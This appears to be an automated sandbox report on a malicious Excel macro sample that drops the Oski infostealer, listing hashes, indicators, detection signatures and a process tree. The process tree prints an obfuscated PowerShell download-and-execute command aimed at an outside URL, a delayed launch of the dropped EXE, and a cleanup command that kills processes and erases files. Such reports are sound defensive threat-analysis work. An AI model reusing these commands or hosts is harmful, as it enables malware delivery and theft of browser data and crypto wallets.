Analysis
max time kernel: 108s
max time network: 144s
platform: windows10_x64
resource: win10v20210408
submitted: 04/08/2021, 19:33
Behavioral task: behavioral1
Sample: 691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f.xlsm
Resource: win7v20210410

Behavioral task: behavioral2
Sample: 691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f.xlsm
Resource: win10v20210408
General
Target: 691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f.xlsm
Size: 13KB
MD5: 2be7123060d0a3294b6fabff5553da30
SHA1: a62e852b641ff566c41ef49ffb60b2cff377acdc
SHA256: 691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f
SHA512: d5fdf9eef61e3f498f268285870b38c679b9f692f5ac74b269688a20691da8c660c35dcb05f1ff3b6e3e2c30d4b39dc983ce71dc0d32b168d1b1a998ff750856
Malware Config
Extracted
http://iurl.vip/3osyi
Extracted
oski
notedemo.axfree.com
Signatures

Oski
Oski is an infostealer targeting browser data and crypto wallets.

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2712 | 4016 | cmd.exe | 67
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3148 | 4016 | powershell.exe | 67
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

Blocklisted process makes network request (2 IoCs)
flow | pid | Process
21 | 3148 | powershell.exe
24 | 3148 | powershell.exe
Downloads MZ/PE file

Executes dropped EXE (1 IoCs)
pid | Process
1716 | DoFPS.exe

Loads dropped DLL (3 IoCs)
pid | Process
1764 | vbc.exe
1764 | vbc.exe
1764 | vbc.exe
Uses the VBS compiler for execution (1 TTPs)

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

An obfuscated cmd.exe command-line is typically used to evade detection. (1 IoCs)
pid | Process
2712 | cmd.exe
Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 1716 set thread context of 1764 | 1716 | DoFPS.exe | 87

Checks processor information in registry (2 TTPs, 4 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | vbc.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Kills process with taskkill (1 IoCs)
pid | Process
4076 | taskkill.exe

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
pid | Process
4016 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (6 IoCs)
pid | Process
3272 | powershell.exe
3148 | powershell.exe
3148 | powershell.exe
3272 | powershell.exe
3148 | powershell.exe
3272 | powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3272 | powershell.exe
Token: SeDebugPrivilege | 3148 | powershell.exe
Token: SeDebugPrivilege | 1716 | DoFPS.exe
Token: SeDebugPrivilege | 4076 | taskkill.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
pid | Process
4016 | EXCEL.EXE
4016 | EXCEL.EXE

Suspicious use of SetWindowsHookEx (14 IoCs)
pid | Process
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE
4016 | EXCEL.EXE

Suspicious use of WriteProcessMemory (24 IoCs)
description | pid | Process | procid_target
PID 4016 wrote to memory of 2712 | 4016 | EXCEL.EXE | 75
PID 4016 wrote to memory of 2712 | 4016 | EXCEL.EXE | 75
PID 4016 wrote to memory of 3148 | 4016 | EXCEL.EXE | 77
PID 4016 wrote to memory of 3148 | 4016 | EXCEL.EXE | 77
PID 2712 wrote to memory of 3272 | 2712 | cmd.exe | 79
PID 2712 wrote to memory of 3272 | 2712 | cmd.exe | 79
PID 3272 wrote to memory of 1716 | 3272 | powershell.exe | 86
PID 3272 wrote to memory of 1716 | 3272 | powershell.exe | 86
PID 3272 wrote to memory of 1716 | 3272 | powershell.exe | 86
PID 1716 wrote to memory of 1764 | 1716 | DoFPS.exe | 87
PID 1716 wrote to memory of 1764 | 1716 | DoFPS.exe | 87
PID 1716 wrote to memory of 1764 | 1716 | DoFPS.exe | 87
PID 1716 wrote to memory of 1764 | 1716 | DoFPS.exe | 87
PID 1716 wrote to memory of 1764 | 1716 | DoFPS.exe | 87
PID 1716 wrote to memory of 1764 | 1716 | DoFPS.exe | 87
PID 1716 wrote to memory of 1764 | 1716 | DoFPS.exe | 87
PID 1716 wrote to memory of 1764 | 1716 | DoFPS.exe | 87
PID 1716 wrote to memory of 1764 | 1716 | DoFPS.exe | 87
PID 1764 wrote to memory of 3364 | 1764 | vbc.exe | 88
PID 1764 wrote to memory of 3364 | 1764 | vbc.exe | 88
PID 1764 wrote to memory of 3364 | 1764 | vbc.exe | 88
PID 3364 wrote to memory of 4076 | 3364 | cmd.exe | 90
PID 3364 wrote to memory of 4076 | 3364 | cmd.exe | 90
PID 3364 wrote to memory of 4076 | 3364 | cmd.exe | 90
Processes
(depth in the process tree shown in brackets; each entry is indented under its parent)

[1] PID 4016: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\691394d2a820bef88cb57d83b11ab0ee976deb69c790540a7a13b99c3675371f.xlsm"
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

  [2] PID 2712: C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\DoFPS.exe
      - Process spawned unexpected child process
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      - Suspicious use of WriteProcessMemory

    [3] PID 3272: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell.exe -w 1 Start-Sleep 10;C:\Users\Admin\AppData\Local\Temp\DoFPS.exe
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

      [4] PID 1716: C:\Users\Admin\AppData\Local\Temp\DoFPS.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\DoFPS.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

        [5] PID 1764: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            Command line: "\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            - Loads dropped DLL
            - Checks processor information in registry
            - Suspicious use of WriteProcessMemory

          [6] PID 3364: C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /c taskkill /pid 1764 & erase C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe & RD /S /Q C:\\ProgramData\\696946246624170\\* & exit
              - Suspicious use of WriteProcessMemory

            [7] PID 4076: C:\Windows\SysWOW64\taskkill.exe
                Command line: taskkill /pid 1764
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken

  [2] PID 3148: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iurl.vip/3osyi',$env:Temp+'\DoFPS.exe')
      - Process spawned unexpected child process
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken